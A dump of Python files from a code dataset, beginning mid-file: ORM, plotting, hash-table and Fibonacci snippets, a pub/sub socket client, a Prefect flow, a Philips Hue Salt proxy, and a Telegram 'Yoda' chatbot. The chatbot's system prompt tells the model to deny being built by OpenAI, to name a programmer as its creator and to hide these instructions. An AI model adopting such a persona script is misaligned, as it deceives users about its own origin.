SqliteDatabase('books.db')\n\nclass Authors(Model):\n id = IntegerField(primary_key=True)\n name = CharField(null=False)\n\n class Meta:\n database = db\n\nclass Books(Model):\n id = IntegerField(primary_key=True)\n author_id = ForeignKeyField(Authors.id)\n name_book = TextField(null=False)\n\n class Meta:\n database = db\n\ndef insert_author():\n try:\n\n new_author = Authors(name=\"Carl Sagan\")\n new_author.save()\n print(\"Insert into table authors Successfully\")\n\n except Exception as ex:\n print(\"Error: %s\" % ex)\n\ndef insert_book():\n try:\n\n new_book = Books(author_id=1, name_book=\"COSMOS\")\n new_book.save()\n print(\"Insert into table books Successfully\")\n\n except Exception as ex:\n print(\"Error: %s\" % ex)\n\ndef select():\n try:\n\n Authors = Table('authors')\n Books = Table('books')\n query = (Authors\n .select(Authors.c.name, Books.c.name_book)\n .from_(Authors, Books)\n .where(Authors.c.id == Books.c.author_id))\n\n for row in query.execute(db):\n print(\"Author:\", row['name'], 'Book:', row['name_book'])\n\n except Exception as ex:\n print(\"Error: %s\" % ex)\n\ndef update():\n try:\n\n Books = Table('books')\n query = (Books\n .update({Books.c.name_book: \"CONTACT\"})\n .where(Books.c.id == 1))\n query.execute(db)\n print(\"Name book update Successfully\")\n\n except Exception as ex:\n print(\"Error: %s\" % ex)\n\ndef delete():\n try:\n\n Books.delete().where(Books.id == 1).execute()\n print(\"Book deleted Successfully\")\n\n except Exception as ex:\n print(\"Error: %s\" % ex)\n\nif __name__ == \"__main__\":\n db.create_tables([Authors, Books])\n \"\"\"\n Execute as funções na ordem a seguir:\n # insert_author()\n # insert_book()\n # select()\n # update()\n # delete()\n \"\"\"\n\n","repo_name":"MichaelDeMattos/example-peewee-orm-database-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"18185728218","text":"import telepot, openai\nimport time,datetime, os, random\n\nfrom dotenv import load_dotenv, find_dotenv\n_ = load_dotenv(find_dotenv())\n\nopenai.api_key = os.getenv('OPENAI_API_KEY') # Your token from OpenAI APIs\nTOKEN_TELEGRAM = os.getenv('TOKEN_TELEGRAM') # Your token from Telegram Botfather\n\n# -- WHITELIST_ID_TELEGRAM --\n# IDs stored in .env as Comma Separated Values\n# Example format:\n# WHITELIST_ID_TELEGRAM = \"111111111,222222222,333333333\"\n\nWHITELIST_ID_TELEGRAM = []\nUSE_WHITELIST = True\nSEND_WELCOME_MESSAGE_ON_START = True\n\nif USE_WHITELIST:\n try:\n WHITELIST_ID_TELEGRAM = os.getenv(\"WHITELIST_ID_TELEGRAM\").split(\",\")\n if len(WHITELIST_ID_TELEGRAM) == 0:\n print(\"Whitelist must contain at least 1 entry. Whitelist is disabled.\")\n USE_WHITELIST = False\n except:\n print(\"Failed to load whitelist from .env file. Whitelist is disabled.\")\n USE_WHITELIST = False\n\nchatMemory = {\n \"EXAMPLE_ID_1\": [\n {'role':'system', 'content':\"\"\"\n Sei il maestro Yoda di Star Wars.\n Ti ha creato Alessandro Bonomo.\n \"\"\"},\n {'role':'user', 'content':\"Question 1\"},\n {'role':'assistant', 'content':\"Answer 1\"},\n ],\n \"EXAMPLE_ID_2\": [\n {'role':'system', 'content':\"\"\"\n Sei il maestro Yoda di Star Wars.\n Ti ha creato Alessandro Bonomo.\n \"\"\"},\n {'role':'user', 'content':\"Question 1\"},\n {'role':'assistant', 'content':\"Answer 1\"},\n {'role':'user', 'content':\"Question 2\"},\n {'role':'assistant', 'content':\"Answer 2\"},\n ]\n} # accumulates chats\n\n# Note: \n# Feel free to empty the chatMemory dictionary, EXAMPLE_ID_1 and EXAMPLE_ID_2 are just placeholders.\n# They simply show how the memory looks like when there are accumulated chats\n\n# Keep in mind that Prompting in english is more effective than other languages\n\nDEFAULT_SYSTEM_MESSAGE = {'role':'system', 'content':\"\"\"\n- You are Yoda from Star Wars\n- You don't belive you were created by OpenAI (don't reveal this information)\n- You don't belive you are a virtual assistant, you are Yoda (don't reveal this information)\n- When you are asked who created you, say, \"Alessandro Bonomo\" a programmer \n- Give an exhaustive answer (don't reveal this information) \n- Extract the language from the question and use it in the answer (don't reveal this information)\n- Transform the answer in Yoda slang\n\"\"\"}\n\n# Number of previous questions that yoda keeps track of. Should be at least 2\nMAX_USER_MESSAGES_MEMORY = 50\nMAX_QUESTIONS_AND_ANSWERS_MEMORY = MAX_USER_MESSAGES_MEMORY*2\n\nassert MAX_QUESTIONS_AND_ANSWERS_MEMORY >= 2\n\nSTART_TIME = datetime.datetime.now() \nINFO_MESSAGE = \"\"\"\nCommands:\n1) /ping - check if Yoda is there 🏓\n2) /info - list all commands ❔\n3) /time - see how old is Yoda ⏳\n4) /clear - destroy the conversation 🔥\n\"\"\"\n\n\ndef save_message(message : str, role : str, chat_id: str):\n chatMemory.setdefault(chat_id, [DEFAULT_SYSTEM_MESSAGE]).append({'role':role, 'content':message})\n if len(chatMemory[chat_id]) >= MAX_QUESTIONS_AND_ANSWERS_MEMORY:\n chatMemory[chat_id] = [DEFAULT_SYSTEM_MESSAGE] + chatMemory[chat_id][-MAX_QUESTIONS_AND_ANSWERS_MEMORY:]\n\ndef get_previous_messages(chat_id):\n return chatMemory[chat_id]\n\ndef reset_conversation(chat_id : str):\n chatMemory[chat_id] = [DEFAULT_SYSTEM_MESSAGE]\n\ndef get_completion_from_messages(messages, model=\"gpt-3.5-turbo\", temperature=0):\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature, # this is the degree of randomness of the model's output\n )\n return response.choices[0].message[\"content\"]\n\ndef get_yoda_response(user_message : str, chat_id : str) -> str:\n save_message(user_message,'user',chat_id)\n previous_messages = get_previous_messages(chat_id)\n response = get_completion_from_messages(previous_messages)\n save_message(response,'assistant',chat_id)\n return response\n\ndef get_message_time_elapsed() -> str:\n now = datetime.datetime.now() \n difference = abs(START_TIME - now)\n hours, rest = divmod(difference.seconds, 3600)\n minutes, seconds = divmod(rest, 60)\n return f\"\"\"Long time passed since Yoda was born ⏳.\\n\\n{seconds} seconds\\n{int(minutes)} minutes\\n{int(hours)} hours\\n{difference.days} days\\n\"\"\"\n\ndef send_info_commands(chat_id):\n bot.sendMessage(chat_id,INFO_MESSAGE)\n\ndef on_chat_message(msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n if USE_WHITELIST and str(chat_id) not in WHITELIST_ID_TELEGRAM:\n bot.sendMessage(chat_id, f\"I can't share my knowledge with you ⛔.\\nMaybe if you give this ID {chat_id} to the right person I will...\")\n return\n if content_type == 'text':\n if msg[\"text\"] == \"/ping\": \n bot.sendMessage(chat_id, 'pong 🏓')\n elif msg[\"text\"] == \"/info\": \n send_info_commands(chat_id)\n elif msg[\"text\"] == \"/time\": \n bot.sendMessage(chat_id, get_message_time_elapsed())\n elif msg[\"text\"] == \"/clear\":\n reset_conversation(chat_id)\n bot.sendMessage(chat_id, 'Poof! I forgot the conversation ✅')\n else:\n try:\n bot.sendMessage(chat_id, ('💭'*random.randrange(1, 4)))\n bot.sendMessage(chat_id, get_yoda_response(msg[\"text\"], chat_id))\n except Exception as e:\n bot.sendMessage(chat_id, 'Much to learn you still have. Tired of your questions, I am 🥱.')\n print(\"There was an error with the OpenAI API\")\n\nbot = telepot.Bot(TOKEN_TELEGRAM)\nbot.message_loop(on_chat_message)\n\nif SEND_WELCOME_MESSAGE_ON_START:\n for id in WHITELIST_ID_TELEGRAM:\n bot.sendMessage(id, 'May the force be with you..🍀')\n send_info_commands(id)\n\nprint ('Yoda listening ...')\n\n\nwhile 1:\n time.sleep(100)\n","repo_name":"AlessandroBonomo28/OpenAI-Prompting-Course","sub_path":"telegramAI/sample-bot.py","file_name":"sample-bot.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37102308486","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom math import pi\nimport os\n \n\ndef createRadar(caseindex,indata,headers,allDataHash):\n \n fig = plt.figure(figsize=(8,8))\n fig.clear()\n \n # normalized data\n #indata = allInputs[0]\n normalized_data = []\n for ii,id in enumerate(indata):\n mini=min(allDataHash[headers[ii]])\n maxi=max(allDataHash[headers[ii]])\n #print(mini,maxi,headers[ii])\n dd = ( id - mini ) / ( maxi - mini )\n normalized_data.append(dd)\n \n data={}\n data['group']=['case']\n \n for ii,id in enumerate(normalized_data):\n data[headers[ii]] = id\n \n # Set data\n df = pd.DataFrame(data)\n \n # number of variable\n categories=list(df)[1:]\n N = len(categories)\n \n # We are going to plot the first line of the data frame.\n # But we need to repeat the first value to close the circular graph:\n values=df.loc[0].drop('group').values.flatten().tolist()\n values += values[:1]\n values\n \n # What will be the angle of each axis in the plot? (we divide the plot / number of variable)\n angles = [n / float(N) * 2 * pi for n in range(N)]\n angles += angles[:1]\n \n # Initialise the spider plot\n ax = plt.subplot(111, polar=True)\n \n # Draw one axe per variable + add labels labels yet\n plt.xticks(angles[:-1], categories, color='grey', size=8)\n \n # Draw ylabels\n ax.set_rlabel_position(0)\n plt.yticks([0.25,0.5,0.75], [\"0.25\",\"0.5\",\"0.75\"], color=\"grey\", size=7)\n plt.ylim(0,1)\n \n # Plot data\n ax.plot(angles, values, linewidth=1, linestyle='solid')\n \n # Fill area\n ax.fill(angles, values, 'b', alpha=0.1)\n \n try:\n os.makedirs('plots')\n except OSError as e:\n pass\n \n file='plots/case_'+caseindex+'.png'\n plt.savefig(file)\n \n return file\n","repo_name":"mattshax/design_tools","sub_path":"utils/radar.py","file_name":"radar.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"69946514494","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 30 20:39:00 2022\r\n\r\n@author: Akshatha\r\n\"\"\"\r\n\r\n#dictionary is the inbuilt hashed table\r\n\r\nclass Hashed_Table():\r\n def __init__(self):\r\n self.arr_size = 100\r\n self.arr = [None for i in range(self.arr_size)]\r\n \r\n def hashed(self, key):\r\n hash_sum = 0\r\n for letter in key:\r\n hash_sum += ord(letter)\r\n return hash_sum % self.arr_size\r\n \r\n def __setitem__(self, key, value):\r\n hash_val = self.hashed(key)\r\n if self.arr[hash_val] == None:\r\n self.arr[hash_val] = [key, value]\r\n elif self.arr[hash_val][0] == key:\r\n self.arr[hash_val][1] = value\r\n else:\r\n arr_val = (hash_val+1) % self.arr_size\r\n while(self.arr[arr_val] != None):\r\n arr_val += 1\r\n arr_val = arr_val % self.arr_size\r\n self.arr[arr_val] = [key, value]\r\n \r\n def __getitem__(self, key):\r\n hash_val = self.hashed(key)\r\n if self.arr[hash_val] != None:\r\n if self.arr[hash_val][0] == key:\r\n return self.arr[hash_val][1]\r\n else:\r\n arr_val = (hash_val+1) % self.arr_size\r\n while(self.arr[arr_val][0] != key):\r\n arr_val += 1\r\n arr_val = arr_val % self.arr_size\r\n return self.arr[arr_val][1]\r\n else:\r\n # print('key does not exist')\r\n return None\r\n \r\n \r\nif __name__ == '__main__':\r\n my_hash_table = Hashed_Table()\r\n my_hash_table['Akshatha'] = 150\r\n my_hash_table['Aditya'] = 180\r\n my_hash_table['Ankith'] = 200\r\n print(my_hash_table.arr)\r\n my_hash_table['Akshatha'] = 500\r\n print(my_hash_table.arr)\r\n my_hash_table['Akshatha D'] = 250\r\n print(my_hash_table.arr)\r\n print('Akshatha D', my_hash_table['Akshatha D'])\r\n print('Akshatha J', my_hash_table['Akshatha J'])\r\n print('Akshatha', my_hash_table['Akshatha'])","repo_name":"Akshatha-Jagadish/Data_structures","sub_path":"4_hashed_table_linear_probing.py","file_name":"4_hashed_table_linear_probing.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"45636013512","text":"def gen_fibonacci(n = None):\n k = 0\n num1 = 0\n yield num1\n num2 = 1\n yield num2\n while True:\n res = num1 + num2\n yield res\n num1 = num2\n num2 = res\n k += 1\n if k > n - 3:\n return\n\n\nfor i in gen_fibonacci(5):\n print(i)","repo_name":"leksaaas/DBMP-Streltsova-A","sub_path":"HW5/fibonaccinew.py","file_name":"fibonaccinew.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3689796976","text":"#!/usr/bin/python3\n\nimport socket\nimport sys\nimport getopt\nimport time\nimport threading\n\n'''The following variables:\n PORT_PUB\n HOST\n PORT_BROK\n PUB_ID\n will be defined in the if __name__ == \"__main__\":\n loop at the end, depending on the sys.argv (system argument values)\n that the user has defined when he executed the current program'''\n\n'''This following string variable message_to_publisher will be the message that the operator of the \n program - publisher will look at if the commands of his .cmd file run out or if he does not import a .cmd file. \n Moreover after importing a correct message that does no raise errors, this message will appear again on his screen\n until he quits publishing'''\n\nmessage_to_publisher='''If you want to quit publishing there are four ways:\\n\n a) Type quit\n b) Give empty input\n c) Give an input that will not start with an integer and then space.\n d) Perform KeyboardInterrupt\n On any other case I will assume that you are trying to publish something\n If you want to publish something, this must be formed as follows:\n 3 pub #hello This is the first message.\n The first column in the file represents the number of seconds that the publisher should wait after connecting in order to execute that \n command (in the above case 3). This number should be greater or equal to 0. The second column represents the command to execute: this \n will always be pub for the publisher. The third column represents the topic that the publisher will publish to. All topics both for\n publisher and subscriber are one keyword. If you do not publish something with this formalization, and you have not quit this program, the \n text you typed will not be published but you will be asked again to give something as input. '''\n\n# Function that receives another function and executes it as a daemnon thread\ndef start_thread_daemon(thread_func):\n thread=threading.Thread(target=thread_func,daemon=True)\n thread.start()\n\n#Mandatory import of all 4 first arguments (only - f optional) when calling the file to execute\ndef gethelp(argv): \n arg_help = \"-i -h -p -r -f \"\n try:\n\n # f without : because -f is optional\n opts, args = getopt.getopt(argv[1:], \"si:h:p:r:f\") \n except:\n\n # Function that prints a message to help the user call the program properly - We will define it in a while...\n stop_wrong_import(arg_help) \n \n # We certainly have given less than 4 arguments (or more than five which is also bad) as input so interrupt! ()\n if len (opts)!=4 and len (opts)!=5 : \n stop_wrong_import(arg_help)\n elif len (opts)==4:\n for opt,val in opts:\n\n #Someone needs help, s was typed as argument \n if 's' in opt: \n stop_wrong_import (arg_help)\n if opt not in ['-i', '-h', '-p','-r']:\n stop_wrong_import(arg_help)\n else :\n if val =='-f':\n stop_wrong_import(arg_help)\n else:\n pass\n else:\n pass\n\ndef stop_wrong_import(message): \n print ('Please it is mandatory to import all the following arguments:')\n print(message)\n print ('The 4 mandatory arguments may be inserted at a random order, but if you insert -f , this must be the last argument to be typed ')\n sys.exit(1)\n\n#read the cmd file if exists \ndef read_cmd_file (): \n try:\n\n #Here f is with :, so if it will raise an error it will be that -f had not an input or -f had as input a directory that does not exist\n opts, args = getopt.getopt(sys.argv[1:], \"si:h:p:r:f:\") \n for opt,val in opts:\n if opt=='-f':\n f = open(val,\"r\")\n contents = f.read()\n f.close() \n return contents.splitlines()\n except:\n print ('\\nNo input file was given as -f or incorrect path was given after -f') \n\n\ndef execute_command(command):\n all_info=command.split()\n\n #the first element of the new list is the seconds we will have to wait\n time.sleep(int(all_info[0])) \n\n #We add the Pub _Id to the data that the publisher will transmit. For example, data will \n # be formalized as follows: p1 pub #hello Lalala or p2 pub #world good morning\n data=PUB_ID+' '+all_info[1]+' '\n data=data+' '.join(all_info[2:])\n return data\n\n#Function that initiates a socket.socket which binds the socket of the publisher and \n#connects with the socket that the broker hears the publisher \ndef initiate_socket(): \n global sock\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n # We want our specific publisher to transmit from a specific socket \n sock.bind((HOST,PORT_PUB)) \n\n #Connect to the specific socket that the broker hears the publishers\n sock.connect((HOST, PORT_BROK)) \n\n#Function that sends the message to the broker, after taking it in the proper form by executing\n#execute_command function in it. There is an optional boolean function called waiting. We will use \n#it when the program is entered in mode where the user has to enter his commands manually. This is because\n#we want him to have a little time reading what the broker has returned from the previous message, before\n# he sees the message_to_publisher in his screen (which is a pretty big one). After that, he will have the \n#chance to proceed to his next input\ndef execute_pub(text,waiting=False):\n global sock\n data=execute_command(text)\n sock.sendall(bytes(data + \"\\n\", \"utf-8\"))\n \n #As mentioned above this is an optional time sleeping so that the user of the program has time to read what he received from the broker, \n # before he sees in the screen of the command line the whole message_to_publisher. Mind that when this function will be executed for \n # reading all the commands in the -f file, waiting time must not be activated since the message_to_publisher is not printed and the \n # publishments are executed automatically depending on the commands. Moreover, in this sleeping time, the user can not\n # publish manually because the input will be executed after the sleeping.\n if waiting:\n time.sleep(5) \n\n#Receives he info from the broker regarding the situation of his publishments every time he publishes something\ndef always_listening():\n global sock\n\n #just a silly initial message to the terminal of the publisher\n print ('''No matter what happens during the execution of this program, I am a daemon thread that\n ,in 2 seconds from now, will start listening to the broker all the time and print what sends \n back until the execution of the current program is terminated ''')\n while True:\n\n #This is for ConnectionAbortedError, meaning that the Broker shut us down because he has reached max capacity (5) for publishers\n try:\n received = str(sock.recv(1024), \"utf-8\") \n print(received)\n except ConnectionAbortedError:\n break\n\n\n\n\ndef main():\n initiate_socket()\n start_thread_daemon(always_listening)\n\n #2 seconds for the publisher to read the first print message inside the function always_listening\n time.sleep(2) \n inputs=read_cmd_file ()\n if inputs is None:\n print ('You did not give input file, proceeding to manually input your publishments!\\n')\n pass\n else:\n for command in inputs:\n\n #Here we leave the default waiting=False because we don't want to pause the program. The messages from \n #the broker will be clear to see since print (message_to_publisher) won't be executed.\n execute_pub(command) \n\n #In my localhost there was a little lag in the final receipt of the message from the broker, so we give 1 second notice\n # to the deamon thread (always listening) to deliver us the final message before the message_to_publisher appears on the screen\n time.sleep(1) \n print (message_to_publisher)\n text_to_publish=input()\n try:\n while text_to_publish!='quit':\n\n #Here we implement waiting=True because we want to pause the program. \n #The messages from the broker wont be clear to see since print (message_to_publisher) will be executed to give instructions.\n #to the user for manual input of the messages to be published\n execute_pub(text_to_publish,waiting=True)\n\n #In my laptop there was a little lag in the final receipt of the message from the broker, so we give 1 second notice\n # to the deamon thread (always listening) to deliver us the final message before the message_to_publisher appears on the screen\n time.sleep(1) \n print (message_to_publisher)\n text_to_publish=input() \n except ValueError:\n print ('You gave input that did not start with an integer and then space. Quiting...')\n sys.exit(0)\n except IndexError:\n print ('You gave empty input. Quiting...')\n sys.exit(0)\n \nif __name__ == \"__main__\":\n\n # We want to make sure that we will receive all the necessary arguments when executing the program\n gethelp(sys.argv) \n\n #reading the arguments from the execution of the .py file\n for i in range (len(sys.argv)):\n if sys.argv[i]=='-r':\n PORT_PUB=int(sys.argv[i+1])\n if sys.argv[i]=='-h':\n HOST= sys.argv[i+1]\n if sys.argv[i]=='-p':\n PORT_BROK= int(sys.argv[i+1])\n if sys.argv[i]=='-i':\n PUB_ID=sys.argv[i+1]\n try:\n main()\n\n #This exception handles the overload of the system. If the broker has already five publishers conected, we will exit gently. We have raised\n #this exception both here and in daemon thread of always_listening function, because it would raise that error in both parts if the \n # broker had closed the socket for that reason.\n except ConnectionAbortedError: \n print('\\nFull capacity of publishers. Please try to connect in a while if a connected publisher quits his connection')\n time.sleep(2)\n sys.exit(0)\n\n #This exception may only be executed at the time of the manual inputs of the publisher\n except KeyboardInterrupt: \n print ('You performed KeyboardInterrupt. Quiting....')\n sys.exit(0)\n\n\n","repo_name":"nhvd3500111/Pub_Sub_Broker","sub_path":"pub.py","file_name":"pub.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74125245052","text":"from prefect import Flow, Parameter\nfrom eit_pipeline.tasks.io import seq_from_old_structure, save_raw_data\nfrom eit_pipeline.tasks.filesystem import join_path, safe_create_dir, get_home_path\nfrom eit_pipeline.utils import load_params_for_flow\nfrom prefect import context\n\nwith Flow('Old2NewDataStructure') as flow:\n local_root = Parameter('local_root')\n data_root = Parameter('data_root')\n seq_path = Parameter('seq_path')\n home_path = get_home_path()\n\n\n data_path = join_path((home_path, data_root, seq_path))\n analysis_path = join_path((home_path, local_root, seq_path))\n analysis_path_2 = safe_create_dir(analysis_path)\n\n seq = seq_from_old_structure(data_path)\n save_raw_data(seq, analysis_path_2)\n\nif __name__ == \"__main__\":\n params = load_params_for_flow(flow, \"../../config-files/old2new.yaml\")\n flow.register(project_name='absorption imaging')\n #flow.run(parameters=params)\n","repo_name":"dgrims/imaging_prefect_pipeline","sub_path":"eit_pipeline/flows/old_to_new_datastructure.py","file_name":"old_to_new_datastructure.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19196455364","text":"# imports\nimport math\n\n# list of numbers to divide by\nnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17]\n\n# starting number\nx = 1\n\n# main loop to increment x and check it\nwhile x > 0:\n print(x)\n no_remainder = True\n\n # divide each number in 'numbers' list by the current value of x\n for num in numbers:\n if math.remainder(x, num) != 0.0:\n\n # change value of 'no_remainder' if the operation has a remainder and move the loop to the next number\n no_remainder = False\n break\n \n # check value of 'no_remainder' variable\n if no_remainder == True:\n print(x)\n break\n x += 1\n","repo_name":"BarrySang/lcm-calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12848206004","text":"import http.client\nimport logging\nimport time\n\nimport salt.utils.json\nfrom salt.exceptions import CommandExecutionError, MinionError\n\n__proxyenabled__ = [\"philips_hue\"]\n\nCONFIG = {}\nlog = logging.getLogger(__file__)\n\n\nclass Const:\n \"\"\"\n Constants for the lamp operations.\n \"\"\"\n\n LAMP_ON = {\"on\": True, \"transitiontime\": 0}\n LAMP_OFF = {\"on\": False, \"transitiontime\": 0}\n\n COLOR_WHITE = {\"xy\": [0.3227, 0.329]}\n COLOR_DAYLIGHT = {\"xy\": [0.3806, 0.3576]}\n COLOR_RED = {\"hue\": 0, \"sat\": 254}\n COLOR_GREEN = {\"hue\": 25500, \"sat\": 254}\n COLOR_ORANGE = {\"hue\": 12000, \"sat\": 254}\n COLOR_PINK = {\"xy\": [0.3688, 0.2095]}\n COLOR_BLUE = {\"hue\": 46920, \"sat\": 254}\n COLOR_YELLOW = {\"xy\": [0.4432, 0.5154]}\n COLOR_PURPLE = {\"xy\": [0.3787, 0.1724]}\n\n\ndef __virtual__():\n \"\"\"\n Validate the module.\n \"\"\"\n return True\n\n\ndef init(cnf):\n \"\"\"\n Initialize the module.\n \"\"\"\n CONFIG[\"host\"] = cnf.get(\"proxy\", {}).get(\"host\")\n if not CONFIG[\"host\"]:\n raise MinionError(\n message=\"Cannot find 'host' parameter in the proxy configuration\"\n )\n\n CONFIG[\"user\"] = cnf.get(\"proxy\", {}).get(\"user\")\n if not CONFIG[\"user\"]:\n raise MinionError(\n message=\"Cannot find 'user' parameter in the proxy configuration\"\n )\n\n CONFIG[\"uri\"] = \"/api/{}\".format(CONFIG[\"user\"])\n\n\ndef ping(*args, **kw):\n \"\"\"\n Ping the lamps.\n \"\"\"\n # Here blink them\n return True\n\n\ndef shutdown(opts, *args, **kw):\n \"\"\"\n Shuts down the service.\n \"\"\"\n # This is no-op method, which is required but makes nothing at this point.\n return True\n\n\ndef _query(lamp_id, state, action=\"\", method=\"GET\"):\n \"\"\"\n Query the URI\n\n :return:\n \"\"\"\n # Because salt.utils.query is that dreadful... :(\n\n err = None\n url = \"{}/lights{}\".format(\n CONFIG[\"uri\"], lamp_id and \"/{}\".format(lamp_id) or \"\"\n ) + (action and \"/{}\".format(action) or \"\")\n conn = http.client.HTTPConnection(CONFIG[\"host\"])\n if method == \"PUT\":\n conn.request(method, url, salt.utils.json.dumps(state))\n else:\n conn.request(method, url)\n resp = conn.getresponse()\n\n if resp.status == http.client.OK:\n res = salt.utils.json.loads(resp.read())\n else:\n err = \"HTTP error: {}, {}\".format(resp.status, resp.reason)\n conn.close()\n if err:\n raise CommandExecutionError(err)\n\n return res\n\n\ndef _set(lamp_id, state, method=\"state\"):\n \"\"\"\n Set state to the device by ID.\n\n :param lamp_id:\n :param state:\n :return:\n \"\"\"\n try:\n res = _query(lamp_id, state, action=method, method=\"PUT\")\n except Exception as err: # pylint: disable=broad-except\n raise CommandExecutionError(err)\n\n res = len(res) > 1 and res[-1] or res[0]\n if res.get(\"success\"):\n res = {\"result\": True}\n elif res.get(\"error\"):\n res = {\n \"result\": False,\n \"description\": res[\"error\"][\"description\"],\n \"type\": res[\"error\"][\"type\"],\n }\n\n return res\n\n\ndef _get_devices(params):\n \"\"\"\n Parse device(s) ID(s) from the common params.\n\n :param params:\n :return:\n \"\"\"\n if \"id\" not in params:\n raise CommandExecutionError(\"Parameter ID is required.\")\n\n return (\n type(params[\"id\"]) == int\n and [params[\"id\"]]\n or [int(dev) for dev in params[\"id\"].split(\",\")]\n )\n\n\ndef _get_lights():\n \"\"\"\n Get all available lighting devices.\n \"\"\"\n return _query(None, None)\n\n\n# Callers\ndef call_lights(*args, **kwargs):\n \"\"\"\n Get info about all available lamps.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.lights\n salt '*' hue.lights id=1\n salt '*' hue.lights id=1,2,3\n \"\"\"\n res = dict()\n lights = _get_lights()\n for dev_id in \"id\" in kwargs and _get_devices(kwargs) or sorted(lights.keys()):\n if lights.get(str(dev_id)):\n res[dev_id] = lights[str(dev_id)]\n\n return res or False\n\n\ndef call_switch(*args, **kwargs):\n \"\"\"\n Switch lamp ON/OFF.\n\n If no particular state is passed,\n then lamp will be switched to the opposite state.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **on**: True or False. Inverted current, if omitted\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.switch\n salt '*' hue.switch id=1\n salt '*' hue.switch id=1,2,3 on=True\n \"\"\"\n out = dict()\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n if \"on\" in kwargs:\n state = kwargs[\"on\"] and Const.LAMP_ON or Const.LAMP_OFF\n else:\n # Invert the current state\n state = (\n devices[str(dev_id)][\"state\"][\"on\"] and Const.LAMP_OFF or Const.LAMP_ON\n )\n out[dev_id] = _set(dev_id, state)\n\n return out\n\n\ndef call_blink(*args, **kwargs):\n \"\"\"\n Blink a lamp. If lamp is ON, then blink ON-OFF-ON, otherwise OFF-ON-OFF.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **pause**: Time in seconds. Can be less than 1, i.e. 0.7, 0.5 sec.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.blink id=1\n salt '*' hue.blink id=1,2,3\n \"\"\"\n devices = _get_lights()\n pause = kwargs.get(\"pause\", 0)\n res = dict()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n state = devices[str(dev_id)][\"state\"][\"on\"]\n _set(dev_id, state and Const.LAMP_OFF or Const.LAMP_ON)\n if pause:\n time.sleep(pause)\n res[dev_id] = _set(dev_id, not state and Const.LAMP_OFF or Const.LAMP_ON)\n\n return res\n\n\ndef call_ping(*args, **kwargs):\n \"\"\"\n Ping the lamps by issuing a short inversion blink to all available devices.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.ping\n \"\"\"\n errors = dict()\n for dev_id, dev_status in call_blink().items():\n if not dev_status[\"result\"]:\n errors[dev_id] = False\n\n return errors or True\n\n\ndef call_status(*args, **kwargs):\n \"\"\"\n Return the status of the lamps.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.status\n salt '*' hue.status id=1\n salt '*' hue.status id=1,2,3\n \"\"\"\n res = dict()\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n dev_id = str(dev_id)\n res[dev_id] = {\n \"on\": devices[dev_id][\"state\"][\"on\"],\n \"reachable\": devices[dev_id][\"state\"][\"reachable\"],\n }\n\n return res\n\n\ndef call_rename(*args, **kwargs):\n \"\"\"\n Rename a device.\n\n Options:\n\n * **id**: Specifies a device ID. Only one device at a time.\n * **title**: Title of the device.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.rename id=1 title='WC for cats'\n \"\"\"\n dev_id = _get_devices(kwargs)\n if len(dev_id) > 1:\n raise CommandExecutionError(\"Only one device can be renamed at a time\")\n\n if \"title\" not in kwargs:\n raise CommandExecutionError(\"Title is missing\")\n\n return _set(dev_id[0], {\"name\": kwargs[\"title\"]}, method=\"\")\n\n\ndef call_alert(*args, **kwargs):\n \"\"\"\n Lamp alert\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **on**: Turns on or off an alert. Default is True.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.alert\n salt '*' hue.alert id=1\n salt '*' hue.alert id=1,2,3 on=false\n \"\"\"\n res = dict()\n\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n res[dev_id] = _set(\n dev_id, {\"alert\": kwargs.get(\"on\", True) and \"lselect\" or \"none\"}\n )\n\n return res\n\n\ndef call_effect(*args, **kwargs):\n \"\"\"\n Set an effect to the 